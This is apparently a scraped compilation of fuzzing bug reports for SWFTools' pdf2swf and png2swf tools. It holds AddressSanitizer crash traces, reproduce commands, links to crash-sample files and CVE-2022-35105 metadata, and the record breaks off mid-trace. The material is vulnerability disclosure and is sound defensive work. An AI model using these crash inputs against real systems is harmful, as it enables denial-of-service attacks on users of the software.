/build/glibc-CVJwZb/glibc-2.27/csu/../csu/libc-start.c:310 #19 0x420b99 in _start (/home/bupt/Desktop/swftools/build/bin/pdf2swf+0x420b99) 0x000001818502 is located 30 bytes to the left of global variable 'zoomtowidth' defined in 'pdf.cc:26:12' (0x1818520) of size 4 0x000001818502 is located 30 bytes to the right of global variable 'threadsafe' defined in 'pdf.cc:29:12' (0x18184e0) of size 4 SUMMARY: AddressSanitizer: global-buffer-overflow /home/bupt/Desktop/swftools/lib/pdf/xpdf/Stream.cc:2804:18 in DCTStream::transformDataUnit(unsigned short*, int*, unsigned char*) Shadow bytes around the buggy address: 0x0000802fb050: f9 f9 f9 f9 f9 f9 f9 f9 f9 f9 f9 f9 f9 f9 f9 f9 0x0000802fb060: f9 f9 f9 f9 f9 f9 f9 f9 f9 f9 f9 f9 f9 f9 f9 f9 0x0000802fb070: f9 f9 f9 f9 f9 f9 f9 f9 f9 f9 f9 f9 f9 f9 f9 f9 0x0000802fb080: f9 f9 f9 f9 f9 f9 f9 f9 f9 f9 f9 f9 00 f9 f9 f9 0x0000802fb090: f9 f9 f9 f9 00 f9 f9 f9 f9 f9 f9 f9 04 f9 f9 f9 =>0x0000802fb0a0:[f9]f9 f9 f9 04 f9 f9 f9 f9 f9 f9 f9 01 f9 f9 f9 0x0000802fb0b0: f9 f9 f9 f9 00 00 00 00 00 00 00 00 00 00 00 00 0x0000802fb0c0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0x0000802fb0d0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0x0000802fb0e0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0x0000802fb0f0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Shadow byte legend (one shadow byte represents 8 application bytes): Addressable: 00 Partially addressable: 01 02 03 04 05 06 07 Heap left redzone: fa Freed heap region: fd Stack left redzone: f1 Stack mid redzone: f2 Stack right redzone: f3 Stack after return: f5 Stack use after scope: f8 Global redzone: f9 Global init order: f6 Poisoned by user: f7 Container overflow: fc Array cookie: ac Intra object redzone: bb ASan internal: fe Left alloca redzone: ca Right alloca redzone: cb Shadow gap: cc ==71185==ABORTING ``` ------------------------------ ## SEGV ### reproduce command to reproduce: ./pdf2swf -G -f -t [sample file] -o /dev/null ### sample file [id0_SEGV.zip](https://github.com/matthiaskramm/swftools/files/9034362/id0_SEGV.zip) ### crash info ``` Error: PDF file is damaged - attempting to reconstruct xref table... AddressSanitizer:DEADLYSIGNAL ==71049==ERROR: AddressSanitizer: SEGV on unknown address 0x000000000008 (pc 0x0000008293e7 bp 0x7ffe8c3e6990 sp 0x7ffe8c3e6700 T0) ==71049==The signal is caused by a READ memory access. ==71049==Hint: address points to the zero page. #0 0x8293e7 in FoFiTrueType::writeTTF(void (*)(void*, char*, int), void*, char*, unsigned short*) /home/bupt/Desktop/swftools/lib/pdf/xpdf/FoFiTrueType.cc:910:24 #1 0x8d28a9 in SplashFTFontEngine::loadTrueTypeFont(SplashFontFileID*, char*, int, unsigned short*, int) /home/bupt/Desktop/swftools/lib/pdf/xpdf/SplashFTFontEngine.cc:160:7 #2 0x8c1fa5 in SplashFontEngine::loadTrueTypeFont(SplashFontFileID*, char*, int, unsigned short*, int) /home/bupt/Desktop/swftools/lib/pdf/xpdf/SplashFontEngine.cc:255:26 #3 0x88430a in SplashOutputDev::doUpdateFont(GfxState*) /home/bupt/Desktop/swftools/lib/pdf/xpdf/SplashOutputDev.cc:1130:36 #4 0x8060a8 in InfoOutputDev::updateFont(GfxState*) /home/bupt/Desktop/swftools/lib/pdf/InfoOutputDev.cc:577:13 #5 0x6f27c5 in Gfx::opShowText(Object*, int) /home/bupt/Desktop/swftools/lib/pdf/xpdf/Gfx.cc:3038:10 #6 0x705f02 in Gfx::execOp(Object*, Object*, int) /home/bupt/Desktop/swftools/lib/pdf/xpdf/Gfx.cc:693:3 #7 0x7049c1 in Gfx::go(int) /home/bupt/Desktop/swftools/lib/pdf/xpdf/Gfx.cc:584:7 #8 0x703ea8 in Gfx::display(Object*, int) /home/bupt/Desktop/swftools/lib/pdf/xpdf/Gfx.cc:556:3 #9 0x6b9401 in Page::displaySlice(OutputDev*, double, double, int, int, int, int, int, int, int, int, Catalog*, int (*)(void*), void*) /home/bupt/Desktop/swftools/lib/pdf/xpdf/Page.cc:317:10 #10 0x6b8cee in Page::display(OutputDev*, double, double, int, int, int, int, Catalog*, int (*)(void*), void*) /home/bupt/Desktop/swftools/lib/pdf/xpdf/Page.cc:264:3 #11 0x6099b0 in PDFDoc::displayPage(OutputDev*, int, double, double, int, int, int, int, int (*)(void*), void*) /home/bupt/Desktop/swftools/lib/pdf/xpdf/PDFDoc.cc:317:27 #12 0x5fcfff in pdf_open(_gfxsource*, char const*) /home/bupt/Desktop/swftools/lib/pdf/pdf.cc:542:14 #13 0x500300 in main /home/bupt/Desktop/swftools/src/pdf2swf.c:738:26 #14 0x7f971e94dc86 in __libc_start_main /build/glibc-CVJwZb/glibc-2.27/csu/../csu/libc-start.c:310 #15 0x420b99 in _start (/home/bupt/Desktop/swftools/build/bin/pdf2swf+0x420b99) AddressSanitizer can not provide additional info. SUMMARY: AddressSanitizer: SEGV /home/bupt/Desktop/swftools/lib/pdf/xpdf/FoFiTrueType.cc:910:24 in FoFiTrueType::writeTTF(void (*)(void*, char*, int), void*, char*, unsigned short*) ==71049==ABORTING ``` ### reproduce command to reproduce: ./pdf2swf -G -f -t [sample file] -o /dev/null ### sample file [id76_SEGV.zip](https://github.com/matthiaskramm/swftools/files/9034364/id76_SEGV.zip) ### crash info ``` ==41269==ERROR: AddressSanitizer: SEGV on unknown address (pc 0x00000091bf07 bp 0x7fff9910e150 sp 0x7fff9910dfa0 T0) ==41269==The signal is caused by a READ memory access. ==41269==Hint: this fault was caused by a dereference of a high value address (see register values below). Disassemble the provided pc to learn which register was used. #0 0x91bf07 in convert_gfxline /home/bupt/Desktop/swftools/lib/gfxpoly/convert.c:31:18 #1 0x91bf07 in gfxpoly_from_fill /home/bupt/Desktop/swftools/lib/gfxpoly/convert.c:250:5 #2 0x90a161 in polyops_fill /home/bupt/Desktop/swftools/lib/devices/polyops.c:247:22 #3 0x7c3e1b in VectorGraphicOutputDev::fillGfxLine(GfxState*, _gfxline*, char) /home/bupt/Desktop/swftools/lib/pdf/VectorGraphicOutputDev.cc:627:5 #4 0x7c3e1b in VectorGraphicOutputDev::endString(GfxState*) /home/bupt/Desktop/swftools/lib/pdf/VectorGraphicOutputDev.cc:805:6 #5 0x71bb67 in Gfx::doShowText(GString*) /home/bupt/Desktop/swftools/lib/pdf/xpdf/Gfx.cc:3300:10 #6 0x6f28e5 in Gfx::opShowText(Object*, int) /home/bupt/Desktop/swftools/lib/pdf/xpdf/Gfx.cc:3042:3 #7 0x705f02 in Gfx::execOp(Object*, Object*, int) /home/bupt/Desktop/swftools/lib/pdf/xpdf/Gfx.cc:693:3 #8 0x7049c1 in Gfx::go(int) /home/bupt/Desktop/swftools/lib/pdf/xpdf/Gfx.cc:584:7 #9 0x703ea8 in Gfx::display(Object*, int) /home/bupt/Desktop/swftools/lib/pdf/xpdf/Gfx.cc:556:3 #10 0x6b9401 in Page::displaySlice(OutputDev*, double, double, int, int, int, int, int, int, int, int, Catalog*, int (*)(void*), void*) /home/bupt/Desktop/swftools/lib/pdf/xpdf/Page.cc:317:10 #11 0x6b8cee in Page::display(OutputDev*, double, double, int, int, int, int, Catalog*, int (*)(void*), void*) /home/bupt/Desktop/swftools/lib/pdf/xpdf/Page.cc:264:3 #12 0x6099b0 in PDFDoc::displayPage(OutputDev*, int, double, double, int, int, int, int, int (*)(void*), void*) /home/bupt/Desktop/swftools/lib/pdf/xpdf/PDFDoc.cc:317:27 #13 0x5f87d5 in render2(_gfxpage*, _gfxdevice*, int, int, int, int, int, int) /home/bupt/Desktop/swftools/lib/pdf/pdf.cc:164:14 #14 0x5f8e64 in pdfpage_rendersection(_gfxpage*, _gfxdevice*, double, double, double, double, double, double) /home/bupt/Desktop/swftools/lib/pdf/pdf.cc:190:5 #15 0x501816 in main /home/bupt/Desktop/swftools/src/pdf2swf.c:832:3 #16 0x7fa199df7c86 in __libc_start_main /build/glibc-CVJwZb/glibc-2.27/csu/../csu/libc-start.c:310 #17 0x420b99 in _start (/home/bupt/Desktop/swftools/build/bin/pdf2swf+0x420b99) AddressSanitizer can not provide additional info. SUMMARY: AddressSanitizer: SEGV /home/bupt/Desktop/swftools/lib/gfxpoly/convert.c:31:18 in convert_gfxline ==41269==ABORTING ``` ### reproduce command to reproduce: ./pdf2swf -G -f -t [sample file] -o /dev/null ### sample file [id87_SEGV.zip](https://github.com/matthiaskramm/swftools/files/9034365/id87_SEGV.zip) ### crash info ``` ==41858==ERROR: AddressSanitizer: SEGV on unknown address (pc 0x0000008e4b57 bp 0x7ffe72186f50 sp 0x7ffe72186e20 T0) ==41858==The signal is caused by a READ memory access. ==41858==Hint: this fault was caused by a dereference of a high value address (see register values below). Disassemble the provided pc to learn which register was used. #0 0x8e4b57 in gfxline_getbbox /home/bupt/Desktop/swftools/lib/gfxtools.c:765:11 #1 0x7c200e in VectorGraphicOutputDev::clipToGfxLine(GfxState*, _gfxline*, char) /home/bupt/Desktop/swftools/lib/pdf/VectorGraphicOutputDev.cc:636:22 #2 0x7c439f in VectorGraphicOutputDev::endTextObject(GfxState*) /home/bupt/Desktop/swftools/lib/pdf/VectorGraphicOutputDev.cc:829:2 #3 0x6ed08a in Gfx::opEndText(Object*, int) /home/bupt/Desktop/swftools/lib/pdf/xpdf/Gfx.cc:2931:8 #4 0x705f02 in Gfx::execOp(Object*, Object*, int) /home/bupt/Desktop/swftools/lib/pdf/xpdf/Gfx.cc:693:3 #5 0x7049c1 in Gfx::go(int) /home/bupt/Desktop/swftools/lib/pdf/xpdf/Gfx.cc:584:7 #6 0x703ea8 in Gfx::display(Object*, int) /home/bupt/Desktop/swftools/lib/pdf/xpdf/Gfx.cc:556:3 #7 0x6b9401 in Page::displaySlice(OutputDev*, double, double, int, int, int, int, int, int, int, int, Catalog*, int (*)(void*), void*) /home/bupt/Desktop/swftools/lib/pdf/xpdf/Page.cc:317:10 #8 0x6b8cee in Page::display(OutputDev*, double, double, int, int, int, int, Catalog*, int (*)(void*), void*) /home/bupt/Desktop/swftools/lib/pdf/xpdf/Page.cc:264:3 #9 0x6099b0 in PDFDoc::displayPage(OutputDev*, int, double, double, int, int, int, int, int (*)(void*), void*) /home/bupt/Desktop/swftools/lib/pdf/xpdf/PDFDoc.cc:317:27 #10 0x5f87d5 in render2(_gfxpage*, _gfxdevice*, int, int, int, int, int, int) /home/bupt/Desktop/swftools/lib/pdf/pdf.cc:164:14 #11 0x5f8e64 in pdfpage_rendersection(_gfxpage*, _gfxdevice*, double, double, double, double, double, double) /home/bupt/Desktop/swftools/lib/pdf/pdf.cc:190:5 #12 0x501816 in main /home/bupt/Desktop/swftools/src/pdf2swf.c:832:3 #13 0x7fa23073cc86 in __libc_start_main /build/glibc-CVJwZb/glibc-2.27/csu/../csu/libc-start.c:310 #14 0x420b99 in _start (/home/bupt/Desktop/swftools/build/bin/pdf2swf+0x420b99) AddressSanitizer can not provide additional info. SUMMARY: AddressSanitizer: SEGV /home/bupt/Desktop/swftools/lib/gfxtools.c:765:11 in gfxline_getbbox ==41858==ABORTING ``` ### reproduce command to reproduce: ./pdf2swf -G -f -t [sample file] -o /dev/null ### sample file [id177_SEGV.zip](https://github.com/matthiaskramm/swftools/files/9034366/id177_SEGV.zip) ### crash info ``` ==51127==ERROR: AddressSanitizer: SEGV on unknown address 0x000000000018 (pc 0x7f36c6dc2eeb bp 0x7ffe41030f10 sp 0x7ffe410306a8 T0) ==51127==The signal is caused by a WRITE memory access. ==51127==Hint: address points to the zero page. #0 0x7f36c6dc2eeb /build/glibc-CVJwZb/glibc-2.27/string/../sysdeps/x86_64/multiarch/memset-vec-unaligned-erms.S:253 #1 0x4b226b in __asan_memset /home/bupt/桌面/tools/llvm-12.0.1/llvm/projects/compiler-rt/lib/asan/asan_interceptors_memintrinsics.cpp:26 #2 0x80ac4a in InfoOutputDev::type3D0(GfxState*, double, double) /home/bupt/Desktop/swftools/lib/pdf/InfoOutputDev.cc:880:21 #3 0x6f686b in Gfx::opSetCharWidth(Object*, int) /home/bupt/Desktop/swftools/lib/pdf/xpdf/Gfx.cc:3964:8 #4 0x705f02 in Gfx::execOp(Object*, Object*, int) /home/bupt/Desktop/swftools/lib/pdf/xpdf/Gfx.cc:693:3 #5 0x7049c1 in Gfx::go(int) /home/bupt/Desktop/swftools/lib/pdf/xpdf/Gfx.cc:584:7 #6 0x703ea8 in Gfx::display(Object*, int) /home/bupt/Desktop/swftools/lib/pdf/xpdf/Gfx.cc:556:3 #7 0x6b9401 in Page::displaySlice(OutputDev*, double, double, int, int, int, int, int, int, int, int, Catalog*, int (*)(void*), void*) /home/bupt/Desktop/swftools/lib/pdf/xpdf/Page.cc:317:10 #8 0x6b8cee in Page::display(OutputDev*, double, double, int, int, int, int, Catalog*, int (*)(void*), void*) /home/bupt/Desktop/swftools/lib/pdf/xpdf/Page.cc:264:3 #9 0x6099b0 in PDFDoc::displayPage(OutputDev*, int, double, double, int, int, int, int, int (*)(void*), void*) /home/bupt/Desktop/swftools/lib/pdf/xpdf/PDFDoc.cc:317:27 #10 0x5fcfff in pdf_open(_gfxsource*, char const*) /home/bupt/Desktop/swftools/lib/pdf/pdf.cc:542:14 #11 0x500300 in main /home/bupt/Desktop/swftools/src/pdf2swf.c:738:26 #12 0x7f36c6c55c86 in __libc_start_main /build/glibc-CVJwZb/glibc-2.27/csu/../csu/libc-start.c:310 #13 0x420b99 in _start (/home/bupt/Desktop/swftools/build/bin/pdf2swf+0x420b99) AddressSanitizer can not provide additional info. SUMMARY: AddressSanitizer: SEGV /build/glibc-CVJwZb/glibc-2.27/string/../sysdeps/x86_64/multiarch/memset-vec-unaligned-erms.S:253 ==51127==ABORTING ``` ### reproduce command to reproduce: ./pdf2swf -G -f -t [sample file] -o /dev/null ### sample file [id247_SEGV.zip](https://github.com/matthiaskramm/swftools/files/9034368/id247_SEGV.zip) ### crash info ``` ==55626==ERROR: AddressSanitizer: SEGV on unknown address 0x000000000048 (pc 0x00000080ad10 bp 0x000000e54600 sp 0x7fff3c224a00 T0) ==55626==The signal is caused by a READ memory access. ==55626==Hint: address points to the zero page. #0 0x80ad10 in InfoOutputDev::type3D1(GfxState*, double, double, double, double, double, double) /home/bupt/Desktop/swftools/lib/pdf/InfoOutputDev.cc:887:12 #1 0x6f6ca3 in Gfx::opSetCacheDevice(Object*, int) /home/bupt/Desktop/swftools/lib/pdf/xpdf/Gfx.cc:3968:8 #2 0x705f02 in Gfx::execOp(Object*, Object*, int) /home/bupt/Desktop/swftools/lib/pdf/xpdf/Gfx.cc:693:3 #3 0x7049c1 in Gfx::go(int) /home/bupt/Desktop/swftools/lib/pdf/xpdf/Gfx.cc:584:7 #4 0x703ea8 in Gfx::display(Object*, int) /home/bupt/Desktop/swftools/lib/pdf/xpdf/Gfx.cc:556:3 #5 0x6b9401 in Page::displaySlice(OutputDev*, double, double, int, int, int, int, int, int, int, int, Catalog*, int (*)(void*), void*) /home/bupt/Desktop/swftools/lib/pdf/xpdf/Page.cc:317:10 #6 0x6b8cee in Page::display(OutputDev*, double, double, int, int, int, int, Catalog*, int (*)(void*), void*) /home/bupt/Desktop/swftools/lib/pdf/xpdf/Page.cc:264:3 #7 0x6099b0 in PDFDoc::displayPage(OutputDev*, int, double, double, int, int, int, int, int (*)(void*), void*) /home/bupt/Desktop/swftools/lib/pdf/xpdf/PDFDoc.cc:317:27 #8 0x5fcfff in pdf_open(_gfxsource*, char const*) /home/bupt/Desktop/swftools/lib/pdf/pdf.cc:542:14 #9 0x500300 in main /home/bupt/Desktop/swftools/src/pdf2swf.c:738:26 #10 0x7f38f630bc86 in __libc_start_main /build/glibc-CVJwZb/glibc-2.27/csu/../csu/libc-start.c:310 #11 0x420b99 in _start (/home/bupt/Desktop/swftools/build/bin/pdf2swf+0x420b99) AddressSanitizer can not provide additional info. SUMMARY: AddressSanitizer: SEGV /home/bupt/Desktop/swftools/lib/pdf/InfoOutputDev.cc:887:12 in InfoOutputDev::type3D1(GfxState*, double, double, double, double, double, double) ==55626==ABORTING ``` ### reproduce command to reproduce: ./pdf2swf -G -f -t [sample file] -o /dev/null ### sample file [id299_SEGV.zip](https://github.com/matthiaskramm/swftools/files/9034500/id299_SEGV.zip) ### crash info ``` ==102977==ERROR: AddressSanitizer: SEGV on unknown address 0x000000000048 (pc 0x00000080ad10 bp 0x000000e54600 sp 0x7ffde73e8d00 T0) ==102977==The signal is caused by a READ memory access. ==102977==Hint: address points to the zero page. #0 0x80ad10 in InfoOutputDev::type3D1(GfxState*, double, double, double, double, double, double) /home/bupt/Desktop/swftools/lib/pdf/InfoOutputDev.cc:887:12 #1 0x6f6ca3 in Gfx::opSetCacheDevice(Object*, int) /home/bupt/Desktop/swftools/lib/pdf/xpdf/Gfx.cc:3968:8 #2 0x705f02 in Gfx::execOp(Object*, Object*, int) /home/bupt/Desktop/swftools/lib/pdf/xpdf/Gfx.cc:693:3 #3 0x7049c1 in Gfx::go(int) /home/bupt/Desktop/swftools/lib/pdf/xpdf/Gfx.cc:584:7 #4 0x703ea8 in Gfx::display(Object*, int) /home/bupt/Desktop/swftools/lib/pdf/xpdf/Gfx.cc:556:3 #5 0x6b9401 in Page::displaySlice(OutputDev*, double, double, int, int, int, int, int, int, int, int, Catalog*, int (*)(void*), void*) /home/bupt/Desktop/swftools/lib/pdf/xpdf/Page.cc:317:10 #6 0x6b8cee in Page::display(OutputDev*, double, double, int, int, int, int, Catalog*, int (*)(void*), void*) /home/bupt/Desktop/swftools/lib/pdf/xpdf/Page.cc:264:3 #7 0x6099b0 in PDFDoc::displayPage(OutputDev*, int, double, double, int, int, int, int, int (*)(void*), void*) /home/bupt/Desktop/swftools/lib/pdf/xpdf/PDFDoc.cc:317:27 #8 0x5fcfff in pdf_open(_gfxsource*, char const*) /home/bupt/Desktop/swftools/lib/pdf/pdf.cc:542:14 #9 0x500300 in main /home/bupt/Desktop/swftools/src/pdf2swf.c:738:26 #10 0x7f93e149ec86 in __libc_start_main /build/glibc-CVJwZb/glibc-2.27/csu/../csu/libc-start.c:310 #11 0x420b99 in _start (/home/bupt/Desktop/swftools/build/bin/pdf2swf+0x420b99) AddressSanitizer can not provide additional info. SUMMARY: AddressSanitizer: SEGV /home/bupt/Desktop/swftools/lib/pdf/InfoOutputDev.cc:887:12 in InfoOutputDev::type3D1(GfxState*, double, double, double, double, double, double) ==102977==ABORTING ``` ### reproduce command to reproduce: ./pdf2swf -G -f -t [sample file] -o /dev/null ### sample file [id359_SEGV.zip](https://github.com/matthiaskramm/swftools/files/9034803/id359_SEGV.zip) ### crash info ``` ==64656==ERROR: AddressSanitizer: SEGV on unknown address 0x62703a2bdf6f (pc 0x00000082c60e bp 0x7fff6931f990 sp 0x7fff6931f700 T0) ==64656==The signal is caused by a READ memory access. #0 0x82c60e in FoFiTrueType::computeTableChecksum(unsigned char*, int) /home/bupt/Desktop/swftools/lib/pdf/xpdf/FoFiTrueType.cc:1776:14 #1 0x82c60e in FoFiTrueType::writeTTF(void (*)(void*, char*, int), void*, char*, unsigned short*) /home/bupt/Desktop/swftools/lib/pdf/xpdf/FoFiTrueType.cc:1146:6 #2 0x8d28a9 in SplashFTFontEngine::loadTrueTypeFont(SplashFontFileID*, char*, int, unsigned short*, int) /home/bupt/Desktop/swftools/lib/pdf/xpdf/SplashFTFontEngine.cc:160:7 #3 0x8c1fa5 in SplashFontEngine::loadTrueTypeFont(SplashFontFileID*, char*, int, unsigned short*, int) /home/bupt/Desktop/swftools/lib/pdf/xpdf/SplashFontEngine.cc:255:26 #4 0x88430a in SplashOutputDev::doUpdateFont(GfxState*) /home/bupt/Desktop/swftools/lib/pdf/xpdf/SplashOutputDev.cc:1130:36 #5 0x8060a8 in InfoOutputDev::updateFont(GfxState*) /home/bupt/Desktop/swftools/lib/pdf/InfoOutputDev.cc:577:13 #6 0x6f27c5 in Gfx::opShowText(Object*, int) /home/bupt/Desktop/swftools/lib/pdf/xpdf/Gfx.cc:3038:10 #7 0x705f02 in Gfx::execOp(Object*, Object*, int) /home/bupt/Desktop/swftools/lib/pdf/xpdf/Gfx.cc:693:3 #8 0x7049c1 in Gfx::go(int) /home/bupt/Desktop/swftools/lib/pdf/xpdf/Gfx.cc:584:7 #9 0x703ea8 in Gfx::display(Object*, int) /home/bupt/Desktop/swftools/lib/pdf/xpdf/Gfx.cc:556:3 #10 0x6b9401 in Page::displaySlice(OutputDev*, double, double, int, int, int, int, int, int, int, int, Catalog*, int (*)(void*), void*) /home/bupt/Desktop/swftools/lib/pdf/xpdf/Page.cc:317:10 #11 0x6b8cee in Page::display(OutputDev*, double, double, int, int, int, int, Catalog*, int (*)(void*), void*) /home/bupt/Desktop/swftools/lib/pdf/xpdf/Page.cc:264:3 #12 0x6099b0 in PDFDoc::displayPage(OutputDev*, int, double, double, int, int, int, int, int (*)(void*), void*) /home/bupt/Desktop/swftools/lib/pdf/xpdf/PDFDoc.cc:317:27 #13 0x5fcfff in pdf_open(_gfxsource*, char const*) /home/bupt/Desktop/swftools/lib/pdf/pdf.cc:542:14 #14 0x500300 in main /home/bupt/Desktop/swftools/src/pdf2swf.c:738:26 #15 0x7f36eef4ac86 in __libc_start_main /build/glibc-CVJwZb/glibc-2.27/csu/../csu/libc-start.c:310 #16 0x420b99 in _start (/home/bupt/Desktop/swftools/build/bin/pdf2swf+0x420b99) AddressSanitizer can not provide additional info. SUMMARY: AddressSanitizer: SEGV /home/bupt/Desktop/swftools/lib/pdf/xpdf/FoFiTrueType.cc:1776:14 in FoFiTrueType::computeTableChecksum(unsigned char*, int) ==64656==ABORTING ``` -------------------------- ## FPE ### reproduce command to reproduce: ./pdf2swf -G -f -t [sample file] -o /dev/null ### sample file [id92_FPE.zip](https://github.com/matthiaskramm/swftools/files/9034371/id92_FPE.zip) ### crash info ``` ==42346==ERROR: AddressSanitizer: FPE on unknown address 0x000000634097 (pc 0x000000634097 bp 0x7fffc9768180 sp 0x7fffc9767b00 T0) #0 0x634097 in DCTStream::readMCURow() /home/bupt/Desktop/swftools/lib/pdf/xpdf/Stream.cc:2123:24 #1 0x632e98 in DCTStream::getChar() /home/bupt/Desktop/swftools/lib/pdf/xpdf/Stream.cc:2040:12 #2 0x60e023 in ImageStream::getLine() /home/bupt/Desktop/swftools/lib/pdf/xpdf/Stream.cc:373:25 #3 0x60dd51 in ImageStream::getPixel(unsigned char*) /home/bupt/Desktop/swftools/lib/pdf/xpdf/Stream.cc:344:5 #4 0x7c9dc5 in VectorGraphicOutputDev::drawGeneralImage(GfxState*, Object*, Stream*, int, int, GfxImageColorMap*, int, int, int, int*, Stream*, int, int, int, GfxImageColorMap*) /home/bupt/Desktop/swftools/lib/pdf/VectorGraphicOutputDev.cc:1303:12 #5 0x7ccc45 in VectorGraphicOutputDev::drawImage(GfxState*, Object*, Stream*, int, int, GfxImageColorMap*, int*, int) /home/bupt/Desktop/swftools/lib/pdf/VectorGraphicOutputDev.cc:1430:5 #6 0x71dc57 in Gfx::doImage(Object*, Stream*, int) /home/bupt/Desktop/swftools/lib/pdf/xpdf/Gfx.cc:3664:12 #7 0x6ec5e0 in Gfx::opXObject(Object*, int) /home/bupt/Desktop/swftools/lib/pdf/xpdf/Gfx.cc:3336:7 #8 0x705f02 in Gfx::execOp(Object*, Object*, int) /home/bupt/Desktop/swftools/lib/pdf/xpdf/Gfx.cc:693:3 #9 0x7049c1 in Gfx::go(int) /home/bupt/Desktop/swftools/lib/pdf/xpdf/Gfx.cc:584:7 #10 0x703ea8 in Gfx::display(Object*, int) /home/bupt/Desktop/swftools/lib/pdf/xpdf/Gfx.cc:556:3 #11 0x6b9401 in Page::displaySlice(OutputDev*, double, double, int, int, int, int, int, int, int, int, Catalog*, int (*)(void*), void*) /home/bupt/Desktop/swftools/lib/pdf/xpdf/Page.cc:317:10 #12 0x6b8cee in Page::display(OutputDev*, double, double, int, int, int, int, Catalog*, int (*)(void*), void*) /home/bupt/Desktop/swftools/lib/pdf/xpdf/Page.cc:264:3 #13 0x6099b0 in PDFDoc::displayPage(OutputDev*, int, double, double, int, int, int, int, int (*)(void*), void*) /home/bupt/Desktop/swftools/lib/pdf/xpdf/PDFDoc.cc:317:27 #14 0x5f87d5 in render2(_gfxpage*, _gfxdevice*, int, int, int, int, int, int) /home/bupt/Desktop/swftools/lib/pdf/pdf.cc:164:14 #15 0x5f8e64 in pdfpage_rendersection(_gfxpage*, _gfxdevice*, double, double, double, double, double, double) /home/bupt/Desktop/swftools/lib/pdf/pdf.cc:190:5 #16 0x501816 in main /home/bupt/Desktop/swftools/src/pdf2swf.c:832:3 #17 0x7f4bc52f2c86 in __libc_start_main /build/glibc-CVJwZb/glibc-2.27/csu/../csu/libc-start.c:310 #18 0x420b99 in _start (/home/bupt/Desktop/swftools/build/bin/pdf2swf+0x420b99) AddressSanitizer can not provide additional info. SUMMARY: AddressSanitizer: FPE /home/bupt/Desktop/swftools/lib/pdf/xpdf/Stream.cc:2123:24 in DCTStream::readMCURow() ==42346==ABORTING ``` --------------------------------- ## out of memory ### reproduce command to reproduce: ./pdf2swf -G -f -t [sample file] -o /dev/null ### sample file [id298_out_of_memory.zip](https://github.com/matthiaskramm/swftools/files/9034503/id298_out_of_memory.zip) ### crash info ```shell ==102601==ERROR: AddressSanitizer: allocator is out of memory trying to allocate 0x2e03f3250 bytes #0 0x4b3160 in malloc /home/bupt/Desktop/tools/llvm-12.0.1/llvm/projects/compiler-rt/lib/asan/asan_malloc_linux.cpp:145 #1 0x92c94f in draw_stroke /home/bupt/Desktop/swftools/lib/gfxpoly/stroke.c:192:26 ==102601==HINT: if you don't care about these errors you may set allocator_may_return_null=1 SUMMARY: AddressSanitizer: out-of-memory /home/bupt/Desktop/tools/llvm-12.0.1/llvm/projects/compiler-rt/lib/asan/asan_malloc_linux.cpp:145 in malloc ==102601==ABORTING ```
bug found in swftools-pdf2swf
https://api.github.com/repos/swftools/swftools/issues/182/comments
0
2022-07-03T08:46:34Z
2022-07-04T03:25:22Z
https://github.com/swftools/swftools/issues/182
1,292,246,190
182
CVE-2022-35105
2022-08-16T21:15:11.107
SWFTools commit 772e55a2 was discovered to contain a heap-buffer overflow via /bin/png2swf+0x552cea.
{ "cvssMetricV2": null, "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "baseScore": 5.5, "baseSeverity": "MEDIUM", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "REQUIRED", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H", "version": "3.1" }, "exploitabilityScore": 1.8, "impactScore": 3.6, "source": "[email protected]", "type": "Primary" } ] }
[ { "source": "[email protected]", "tags": [ "Exploit", "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/matthiaskramm/swftools/issues/183" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:swftools:swftools:-:*:*:*:*:*:*:*", "matchCriteriaId": "05E27E60-6223-457B-BF90-E747C9C5DEE1", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
https://github.com/matthiaskramm/swftools/issues/183
[ "Exploit", "Issue Tracking", "Third Party Advisory" ]
github.com
[ "matthiaskramm", "swftools" ]
Hi, I currently learn to use fuzz tech to detect bugs and I found something in this repo. in order to reproduce the crash info, please attach ASAN when you compile this repo. ## heap buffer overflow ### reproduce command to reproduce the crash : ./png2swf -j 50 [sample file] -o /dev/null ### sample file [id0_heap-buffer-overflow.zip](https://github.com/matthiaskramm/swftools/files/9034381/id0_heap-buffer-overflow.zip) ### crash info ``` ==109951==ERROR: AddressSanitizer: heap-buffer-overflow on address 0x60200000001c at pc 0x0000004f680f bp 0x7ffde7515f90 sp 0x7ffde7515f88 READ of size 1 at 0x60200000001c thread T0 #0 0x4f680e in png_read_header /home/bupt/Desktop/swftools/src/png2swf.c:184:10 #1 0x4fbbf8 in CheckInputFile /home/bupt/Desktop/swftools/src/png2swf.c:583:9 #2 0x4fca4e in args_callback_command /home/bupt/Desktop/swftools/src/png2swf.c:754:9 #3 0x4fcfd4 in processargs /home/bupt/Desktop/swftools/src/./../lib/args.h:89:16 #4 0x4fcfd4 in main /home/bupt/Desktop/swftools/src/png2swf.c:802:5 #5 0x7fc97197cc86 in __libc_start_main /build/glibc-CVJwZb/glibc-2.27/csu/../csu/libc-start.c:310 #6 0x41ce29 in _start (/home/bupt/Desktop/swftools/build/bin/png2swf+0x41ce29) 0x60200000001c is located 0 bytes to the right of 12-byte region [0x602000000010,0x60200000001c) allocated by thread T0 here: #0 0x4af3f0 in malloc /home/bupt/Desktop/tools/llvm-12.0.1/llvm/projects/compiler-rt/lib/asan/asan_malloc_linux.cpp:145 #1 0x4f579b in png_read_chunk /home/bupt/Desktop/swftools/src/png2swf.c:127:18 #2 0x4f5cc6 in png_read_header /home/bupt/Desktop/swftools/src/png2swf.c:170:11 #3 0x4fbbf8 in CheckInputFile /home/bupt/Desktop/swftools/src/png2swf.c:583:9 #4 0x4fca4e in args_callback_command /home/bupt/Desktop/swftools/src/png2swf.c:754:9 #5 0x4fcfd4 in processargs /home/bupt/Desktop/swftools/src/./../lib/args.h:89:16 #6 0x4fcfd4 in main 